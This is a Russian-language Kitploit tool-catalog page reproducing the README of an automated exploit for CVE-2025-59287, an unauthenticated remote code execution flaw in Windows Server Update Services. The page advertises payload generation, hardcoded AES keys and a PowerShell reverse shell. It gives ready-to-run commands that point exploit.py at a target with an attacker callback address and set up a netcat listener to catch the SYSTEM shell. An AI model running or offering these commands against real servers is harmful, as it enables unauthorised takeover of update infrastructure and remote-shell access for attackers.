Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-59287 — Автоматический эксплойт для CVE-2025-59287 — неаутентифицированное RCE в WSUS, включающий генерацию полезной нагрузки, прослушиватель обратной оболочки и шифрование AES с жестко заданными ключами. | Kitploit
Инструменты/GitHubGitHub/garvitv14/cve-2025-59287
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеКомандование и УправлениеИнструмент Удаленного Доступа
GitHubgarvitv14/cve-2025-59287

CVE-2025-59287

Автоматический эксплойт для CVE-2025-59287 — неаутентифицированное RCE в WSUS, включающий генерацию полезной нагрузки, прослушиватель обратной оболочки и шифрование AES с жестко заданными ключами.

Репозиторий
16210 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2025-59287 WSUS RCE Exploit

Автоматизированный эксплойт для уязвимости удалённого выполнения кода без аутентификации в Windows Server Update Services (WSUS).

Сведения об уязвимости

  • CVE ID: CVE-2025-59287
  • CVSS Score: 9.8 (Critical)
  • Attack Vector: Network
  • Authentication: None required
  • Impact: Remote Code Execution as SYSTEM

Возможности

✅ Полностью автоматическая генерация полезной нагрузки
✅ Автоматическая загрузка зависимости ysoserial.NET
✅ Встроенный слушатель reverse shell
✅ Кроссплатформенная поддержка (Windows/Linux/Mac)
✅ Шифрование AES с использованием встроенных ключей WSUS
✅ Полезная нагрузка PowerShell reverse shell

Требования

pip install -r requirements.txt

Зависимости Python

Среда выполнения .NET (определяется автоматически)

  • Windows: .NET Framework (встроенный)
  • Linux/Mac: Wine или Mono Ubuntu/Debian
  • sudo apt install wine-stable

    sudo apt install mono-complete

    Установка

    Клонируйте или скачайте файлы эксплойта

    cd CVE-2025-59287-exploit

    Запустите эксплойт (автоматически загрузит ysoserial.NET)

    python3 exploit.py -u http://target:8530 -lhost YOUR_IP -lport 4444

    Использование

    Базовая эксплуатация

    python3 exploit.py -u http://192.168.1.100:8530 -lhost 10.10.14.5 -lport 4444

    если нужна сессия на другом слушателе

    Терминал 1: Запустите слушатель netcat

    nc -lvnp 4444

    Терминал 2: Запустите эксплойт без встроенного слушателя

    python3 exploit.py -u http://target:8530 -lhost 10.10.14.5 -lport 4444 --no-listener

    Скачать инструмент